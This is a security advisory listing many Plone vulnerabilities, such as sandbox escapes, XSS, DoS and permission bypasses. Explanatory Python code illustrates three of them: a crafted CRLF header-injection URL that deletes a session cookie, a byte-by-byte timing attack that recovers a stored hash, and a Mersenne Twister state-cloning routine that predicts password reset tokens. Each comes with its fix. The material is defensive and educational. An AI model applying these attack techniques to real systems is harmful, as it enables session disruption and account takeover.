Security vulnerability announcement: 20121106 - Multiple vectors
Restricted Python injection
Anonymous users can cause an arbitrary Python statement to be run the next time the admin interface is accessed. No breakout of the built-in Python sandbox is possible, but the statement runs with the privileges of the admin user who triggers it.
Reflected HTTP header injection
A crafted URL can inject arbitrary HTTP headers into the response returned to the user. This can be used to log users out, for example.
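Worked illustration of the header injection above (added for this page; it is not Plone's code and does not reproduce the affected URL). A redirect target taken from a query parameter, here an assumed parameter called came_from, is copied into the Location header unchecked; a percent-encoded CR LF in it ends that header and starts a Set-Cookie header that expires the session cookie, assumed here to be named __ac, which is the log-out effect the advisory describes. The hardened builder refuses any value containing CR or LF.

```python
from urllib.parse import urlparse, unquote

CRLF = "\r\n"

# Constructed attacker URL: %0d%0a splits the Location header, and the text after it becomes
# a second header that deletes the (assumed) __ac session cookie in the victim's browser.
ATTACK_URL = (
    "https://example.org/login_form?came_from=/home"
    "%0d%0aSet-Cookie:%20__ac=deleted%3B%20expires=Thu,%2001%20Jan%201970%2000:00:00%20GMT%3B%20path=/"
)


def target_from_url(url):
    """Pull came_from out of the query string and percent-decode it, as a framework would."""
    params = dict(p.split("=", 1) for p in urlparse(url).query.split("&"))
    return unquote(params["came_from"])


def build_redirect_vulnerable(target):
    """The flawed pattern: the user-controlled value goes straight into a header line."""
    return "HTTP/1.1 302 Found" + CRLF + "Location: " + target + CRLF + CRLF


def build_redirect_hardened(target):
    """Same response, but a value that could terminate a header line is rejected outright."""
    if "\r" in target or "\n" in target:
        raise ValueError("refusing header value containing CR or LF")
    return "HTTP/1.1 302 Found" + CRLF + "Location: " + target + CRLF + CRLF


def parse_headers(raw_response):
    """Split a raw HTTP response head into (name, value) pairs, as a browser would."""
    head = raw_response.split(CRLF + CRLF, 1)[0]
    headers = []
    for line in head.split(CRLF)[1:]:          # skip the status line
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return headers


def injected_headers(url):
    """Headers the browser sees beyond Location when the vulnerable builder handles `url`."""
    raw = build_redirect_vulnerable(target_from_url(url))
    return [h for h in parse_headers(raw) if h[0] != "Location"]


def hardened_rejects(url):
    """True when the hardened builder refuses the redirect target carried by `url`."""
    try:
        build_redirect_hardened(target_from_url(url))
    except ValueError:
        return True
    return False
```

Most current HTTP server libraries already refuse header values containing CR or LF; the explicit check above makes that rule visible at the point where untrusted input meets the response.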
Restricted Python sandbox escape
The sandbox whitelisting function is accidentally exposed when it is imported from a certain non-standard location.
Partial restricted Python sandbox escape
Incomplete security declarations on certain objects allow the permission check to be bypassed on some of their functions.
Reflected XSS
A crafted URL can cause a caller-supplied response body (or redirect target) to be returned, because internal methods of the response file handle are accidentally exposed on a URL.
Partial permissions bypass
A crafted URL can be used to access a subset of the attributes of unpublished content items, provided the content's path is known.
Restricted Python sandbox escape
Escape from the sandbox through a utility function that does not check that its inputs are valid, allowing access to the trusted builtins.
Reflected XSS
A utility function is callable directly through a crafted URL; the default value it accepts is reflected into the response unescaped.
Anonymous users can list user account names
A method of the membership database is insufficiently protected, allowing users who lack the permission to enumerate users to do so through a crafted URL.
Partial denial of service through Collections functionality
A crafted request to the Collections functionality causes large amounts of I/O and cache churn; repeated requests can therefore be used to deny service to a site.
Anonymous users can batch change titles of content items
The batch ID change script does not correctly handle anonymous users who change titles while leaving the IDs unchanged. This allows anonymous users to craft a POST request (once they have obtained a valid CSRF token) that changes content titles arbitrarily.
Crafted URL allows downloading of BLOBs that are not visible to the user
BLOBs stored on custom content types can be accessed through a non-standard URL, bypassing the declared permission check
Persistent XSS via filtering bypass
HTML content crafted by users may allow execution of arbitrary javascript on specific browsers.
Users connected through FTP can list hidden folder contents
Users can read the listing of folders (but not access the files themselves) that they would otherwise be unable to access.
Persistent XSS
Crafted URLs allow arbitrary strings (including full HTML) to be stored in memory against a key, that can then be read out again on a related URL.
Attempting to access a view with no name returns an internal data structure
Some types of URL are ambiguous, and their unambiguous form permits anonymous views. On some content types an anonymous view lookup returns a private data structure, which under certain circumstances can be used to read out confidential data.
DoS through RSS on private folder
A specially crafted URL invoking the RSS feed for a folder the user has no access to (but knows the path of) can cause an infinite loop, tying up a server thread.
Timing attack in password validation
The equality test in our authentication system is not constant time: it returns at the first differing byte, so a user with a sufficiently stable, fast connection to the server can learn the stored hash one prefix byte at a time.
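Worked illustration of the timing attack above (added for this page; not Plone's authentication code). Instead of measuring wall-clock time, the early-exit comparison reports how many bytes it examined before returning, which is exactly the quantity a remote attacker estimates from response latency over many samples. The attacker loop recovers the constructed stored SHA-256 digest byte by byte against the leaky comparison and gets nothing useful from the constant-time one; the fix shown is the standard library's hmac.compare_digest.

```python
import hashlib
import hmac

# Constructed stored credential. The server compares digests, so what the side channel
# leaks is the stored hash, a prefix at a time, not the password itself.
STORED_HASH = hashlib.sha256(b"correct horse battery staple").digest()


def leaky_equals(stored, guess):
    """Early-exit comparison like the vulnerable test. Returns (match, work): `work` is the
    number of bytes examined, standing in for the response time an attacker would measure."""
    if len(stored) != len(guess):
        return False, 0
    work = 0
    for a, b in zip(stored, guess):
        work += 1
        if a != b:
            return False, work
    return True, work


def constant_time_equals(stored, guess):
    """Examines every byte regardless of where the first difference is."""
    if len(stored) != len(guess):
        return False, 0
    diff = 0
    for a, b in zip(stored, guess):
        diff |= a ^ b
    return diff == 0, len(stored)


def recover_hash(oracle, length):
    """Attacker loop: at each position submit all 256 byte values and keep the one the oracle
    spent longest on. Against a constant-time oracle every candidate costs the same, so the
    loop learns nothing and just keeps its first candidate."""
    found = bytearray()
    for pos in range(length):
        best, best_work = 0, -1
        for c in range(256):
            guess = bytes(found) + bytes([c]) + b"\x00" * (length - pos - 1)
            match, work = oracle(guess)
            if match:
                return guess
            if work > best_work:
                best, best_work = c, work
        found.append(best)
    return bytes(found)


def check_password_fixed(password, stored=STORED_HASH):
    """The fix: hmac.compare_digest runs in time independent of where the inputs differ."""
    return hmac.compare_digest(hashlib.sha256(password).digest(), stored)
```

In a real deployment the per-byte difference is nanoseconds and must be averaged over many requests and filtered for network jitter, which is why the advisory qualifies the attacker as needing a stable, fast connection; the instrumented oracle removes that noise so the mechanism is visible.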
PRNG isn't reseeded
We use Python's random module (seeded once from the system random source at startup) rather than the system random source itself, so in a long-running process the generator is never reseeded. In addition, our error pages leak numbers drawn from it, allowing the state of the PRNG used for password resets to be derived and future tokens to be predicted.
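Worked illustration of the PRNG issue above (added for this page; not Plone's code, and the token format and error-page leak are constructed stand-ins). Python's random module is a Mersenne Twister (MT19937) whose output is a reversible tempering of its 624-word state, so an attacker who collects 624 consecutive 32-bit outputs, one per error page in the scenario below, can rebuild the generator, advance it, and compute the next password reset token before the victim requests it. The fix draws tokens from the OS entropy source via secrets instead.

```python
import random
import secrets

N = 624  # MT19937 keeps 624 32-bit state words; one leaked output per word is enough


def untemper(y):
    """Invert MT19937's output tempering to recover the raw state word behind one output."""
    y ^= y >> 18
    y ^= (y << 15) & 0xEFC60000
    x = y
    for _ in range(5):                      # the 7-bit shift needs ceil(32/7) rounds to unwind
        x = y ^ ((x << 7) & 0x9D2C5680)
    y = x
    x = y
    for _ in range(3):                      # likewise for the 11-bit shift
        x = y ^ (x >> 11)
    return x & 0xFFFFFFFF


def clone_generator(leaked_outputs):
    """Return a random.Random in the same state as the generator that produced
    `leaked_outputs` (exactly 624 consecutive getrandbits(32) results)."""
    if len(leaked_outputs) != N:
        raise ValueError("need exactly %d consecutive 32-bit outputs" % N)
    state = tuple(untemper(o) for o in leaked_outputs)
    clone = random.Random()
    clone.setstate((3, state + (N,), None))  # index N: next call twists, exactly as on the server
    return clone


def reset_token(rng):
    """Constructed token format: 128 bits pulled from the process-wide PRNG, hex encoded."""
    return "".join("%08x" % rng.getrandbits(32) for _ in range(4))


def predict_next_token(seed):
    """Server generator seeded once at startup and never reseeded; the attacker harvests 624
    leaked numbers (one per error page triggered), clones the state and predicts the token."""
    server_rng = random.Random(seed)
    leaked = [server_rng.getrandbits(32) for _ in range(N)]
    attacker_rng = clone_generator(leaked)
    predicted = reset_token(attacker_rng)
    actual = reset_token(server_rng)        # the token later issued for a victim's reset request
    return predicted, actual


def safe_reset_token():
    """The fix: tokens from the OS entropy source, not from a seeded user-space PRNG."""
    return secrets.token_hex(16)
```

Reseeding would not help on its own: the generator is deterministic between reseeds, so any leak of its outputs is a leak of every value it will produce until the next reseed. Tokens that gate account recovery need an unpredictable source, which is what secrets (os.urandom underneath) provides.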
Form detail exposure
A vulnerability in z3c.form leaks the default values of form fields through crafted URLs.

